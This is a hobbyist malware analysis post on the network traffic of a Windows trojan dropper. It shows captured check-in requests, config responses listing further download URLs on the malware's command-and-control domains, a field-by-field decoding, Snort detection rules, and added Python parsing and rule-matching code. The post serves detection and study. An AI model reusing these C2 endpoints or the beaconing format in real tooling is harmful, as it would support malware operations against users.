
TrojanDropper:Win32/Microjoin.gen!C - Part 1 (Network Activity)

Some random malware that I did a fairly rookie analysis of. Here’s the skinny:

filename: csrzq.exe

md5sum: aa596a067813bf44937635cd8413ddfc

At first glance at the network traffic, this looked like a classic downloader. One of the first things it did was try to resolve “xn.bisque110.com” and then retrieve what appears to be a config listing where it can potentially get more malware:

POST /yt.php HTTP/1.1
Accept: */*
Host: xn.bisque110.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 09 Jun 2011 20:09:25 GMT
Server: Apache
Content-Length: 67
Connection: close
Content-Type: text/html

[main]
u=http://xn.bisque110.com/lf
u=http://en.bjork2.com/lf
c=/S

Since I wanted to look only at the dropper, and not at whatever it was requesting, I blackholed “xn.bisque110.com” and “en.bjork2.com” to see what else might happen.

The trojan then performed some “check-in” activity, requesting “1.gif” from 122.770304123.cn. This was really just a 3-byte file containing the text “ok”, presumably to tell the trojan that it has a working connection and can proceed:

GET /1.gif HTTP/1.1
Accept: */*
Host: 122.770304123.cn
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 11 Jun 2011 20:01:49 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
Last-Modified: Mon, 27 Sep 2010 08:43:59 GMT
ETag: "4150008-3-babdb1c0"
Accept-Ranges: bytes
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

ok

Immediately following is what looks like more check-in activity: the host makes a POST carrying what appears to be a unique identifier for the machine. The UID changed each time I reverted my VM snapshot and ran the sample again. I have not yet figured out the response, but it remained constant: the simple text “1,2,8,4”:

POST /ue000/38sw.e?uid=276006272012936342922421 HTTP/1.1
Accept: */*
Host: 122.770304123.cn
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 09 Jun 2011 23:05:48 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
Last-Modified: Mon, 08 Jan 2007 09:45:08 GMT
ETag: "a8217-8-48eef100"
Accept-Ranges: bytes
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain

1,2,8,4

A couple of things to note about each of these HTTP requests: none of them appear to be proxy-aware, as I had the VM configured to use an internal proxy and they did not go through it. They also lack a User-Agent header.

The host then switches to checking in with a different host, using the same initial request but to “110.770304123.cn”:

GET /1.gif HTTP/1.1
Accept: */*
Host: 110.770304123.cn
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 11 Jun 2011 20:01:51 GMT
Server: Apache/2.2.4 (Unix)
Last-Modified: Mon, 27 Sep 2010 08:45:41 GMT
ETag: "984395-3-c0d21740"
Accept-Ranges: bytes
Content-Length: 3
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif

ok

This time it makes some more obviously identifiable requests to retrieve a configuration file:

POST /player/blog.updata?v=1.5.3.8&r1=7fc558536654b7a8b29820fbe4e8ef77&tm=2010-12-08%2020:36:28&os=Windows%20XP.2600&uid=276006272012936342988806&cht=0 HTTP/1.1
Accept: */*
Host: 110.770304123.cn
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Sat, 11 Jun 2011 20:01:52 GMT
Server: Apache/2.2.4 (Unix)
Content-Length: 172
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

[login]
ip=1658837058
ar=NO
idx=http://343.boolans.com/list/2011-06-12/ALL.y
q=http://343.boolans.com/list/2011-06-12/ut_ALL.y
b=http://343.boolans.com/list/bl.y
up=
arg=/S

Picking apart the POST request we can see:

  • v=1.5.3.8 - Looks like a version number, though it’s unclear at this point what exactly it’s a version of.
  • r1=7fc558536654b7a8b29820fbe4e8ef77 - Not quite sure what this is, but it looks like an MD5 hash of something.
  • tm=2010-12-08%2020:36:28 - The local time on the machine (yes, my VM’s time is way off /eyeroll).
  • os=Windows%20XP.2600 - OS version and build number.
  • uid=276006272012936342988806 - Another unique identifier for the machine. Interestingly, it differs from the one in the very first check-in, so it must be unique to the session.
  • cht=0 - Not quite sure what this represents at this time.

The data returned is a config file with login information:

  • ip=1658837058 - Appears to be a numeric representation of an IP address. Drawing on some DB experience, I remembered that MySQL has a function INET_ATON() which takes a string argument of an IP and converts it to a numeric value. Conversely, there is also INET_NTOA() which takes an integer argument and converts it to an IP. So I plugged this in, and sure enough, it was my external IP address:
mysql> select inet_ntoa(1658837058);
+-----------------------+
| inet_ntoa(1658837058) |
+-----------------------+
| 98.223.216.66         |
+-----------------------+
1 row in set (0.00 sec)
  • ar=NO - Currently unsure what this represents.
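As an added example (not code from the original post), here is a small Python parser for the two INI-style responses quoted above. It keeps every repeated “u=” URL from the [main] section, which configparser would collapse, and decodes the numeric ip= field from [login] the same way INET_NTOA() does. The sample bodies are constructed copies of the responses shown in this post.

```python
import ipaddress

# Constructed copies of the two response bodies quoted in the post.
MAIN_CONFIG = """[main]
u=http://xn.bisque110.com/lf
u=http://en.bjork2.com/lf
c=/S
"""

LOGIN_CONFIG = """[login]
ip=1658837058
ar=NO
idx=http://343.boolans.com/list/2011-06-12/ALL.y
q=http://343.boolans.com/list/2011-06-12/ut_ALL.y
b=http://343.boolans.com/list/bl.y
up=
arg=/S
"""


def parse_config(body):
    """Parse the INI-like config into {section: {key: [values]}}.
    configparser is avoided because [main] repeats the 'u=' key and
    every URL matters, not just the last one."""
    sections = {}
    current = None
    for raw in body.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def inet_ntoa(n):
    """Decode the numeric 'ip=' field the same way MySQL's INET_NTOA() does."""
    return str(ipaddress.IPv4Address(n))


def extract_urls(sections):
    """Every http(s) URL the config directs the dropper to fetch."""
    return [v for sec in sections.values() for vals in sec.values()
            for v in vals if v.startswith(("http://", "https://"))]
```

Running inet_ntoa(1658837058) gives the same 98.223.216.66 that the MySQL query above returned.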

The next three lines were URLs that the host immediately proceeded to request. Interestingly, unlike the previous HTTP attempts, these were all proxy-aware and went through the internal proxy configured on the host. They also all reported a User-Agent, “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”, which is exactly what I was running, so I suspect it was built from what’s stored in the registry.

Sidebar: for a really awesome article on user agents, check out http://msdn.microsoft.com/en-us/library/ms537503(v=vs.85).aspx

All of the URLs returned “Content-Type: text/plain”, but they clearly were not. More on these in the next post.

At this point, I’ll wrap up this post with some (untested) Snort signatures I came up with that should be able to detect some of the network traffic covered so far:

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Trojan.Dropper Requesting Config 1"; content:"POST|202f|yt|2e|php|20|HTTP|2f|"; content:!"User-Agent:"; content:"Content-Length|3a20|0|0d0a|"; sid: 9000001;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Trojan.Dropper Requesting Config 2"; content:"POST|20|"; content:!"User-Agent:"; content:"Content-Length|3a20|0|0d0a|"; pcre:"/POST [^\x3f]+\x3fuid=[0-9]{20,} HTTP/i"; sid: 9000002;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg:"Trojan.Dropper Requesting Config 3"; content:"POST|20|"; content:!"User-Agent:"; content:"Content-Length|3a20|0|0d0a|"; pcre:"/POST [^\x3f]+\x3fv=[0-9.]+\x26r1=[0-9a-z]+\x26tm=[^\x26]+\x26os=[^\x26]+\x26uid=[0-9]{20,}\x26cht=[0-9] HTTP/i"; sid: 9000003;)
(via: threatexpert.com)
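As an added example (not part of the original post), the following Python re-implements the matching logic of the three signatures above and runs it over constructed request headers modelled on the captures in this post, plus one benign POST that carries a User-Agent to show the negative match. The \x3f and \x26 escapes from the pcre options are written as ? and & here.

```python
import re

# Constructed request headers modelled on the captures quoted in the post,
# joined with CRLF as they would appear on the wire.
REQUESTS = {
    "config1": "POST /yt.php HTTP/1.1\r\nAccept: */*\r\nHost: xn.bisque110.com\r\n"
               "Content-Length: 0\r\nConnection: Keep-Alive\r\n\r\n",
    "checkin": "POST /ue000/38sw.e?uid=276006272012936342922421 HTTP/1.1\r\n"
               "Accept: */*\r\nHost: 122.770304123.cn\r\nContent-Length: 0\r\n\r\n",
    "login": "POST /player/blog.updata?v=1.5.3.8&r1=7fc558536654b7a8b29820fbe4e8ef77"
             "&tm=2010-12-08%2020:36:28&os=Windows%20XP.2600&uid=276006272012936342988806"
             "&cht=0 HTTP/1.1\r\nAccept: */*\r\nHost: 110.770304123.cn\r\nContent-Length: 0\r\n\r\n",
    # Same empty POST, but a browser User-Agent is present: the rules must not fire.
    "benign": "POST /yt.php HTTP/1.1\r\nHost: example.invalid\r\n"
              "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
              "Content-Length: 0\r\n\r\n",
}


def _no_ua(req):          # content:!"User-Agent:"
    return "User-Agent:" not in req


def _empty_body(req):     # content:"Content-Length|3a20|0|0d0a|"
    return "Content-Length: 0\r\n" in req


# Python equivalents of the three Snort rules: every predicate in the list
# must hold, mirroring the AND of content:/content:!/pcre: options. The
# \x3f and \x26 escapes in the original pcre are written as ? and & here.
RULES = {
    9000001: [lambda r: "POST /yt.php HTTP/" in r, _no_ua, _empty_body],
    9000002: [lambda r: "POST " in r, _no_ua, _empty_body,
              lambda r: re.search(r"POST [^?]+\?uid=[0-9]{20,} HTTP", r, re.I)],
    9000003: [lambda r: "POST " in r, _no_ua, _empty_body,
              lambda r: re.search(r"POST [^?]+\?v=[0-9.]+&r1=[0-9a-z]+&tm=[^&]+"
                                  r"&os=[^&]+&uid=[0-9]{20,}&cht=[0-9] HTTP", r, re.I)],
}


def match_rules(request):
    """Return the sorted sids whose predicates all match this request."""
    return sorted(sid for sid, preds in RULES.items()
                  if all(p(request) for p in preds))


def scan(requests=REQUESTS):
    """Map each labelled request to the sids it triggers."""
    return {name: match_rules(req) for name, req in requests.items()}
```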
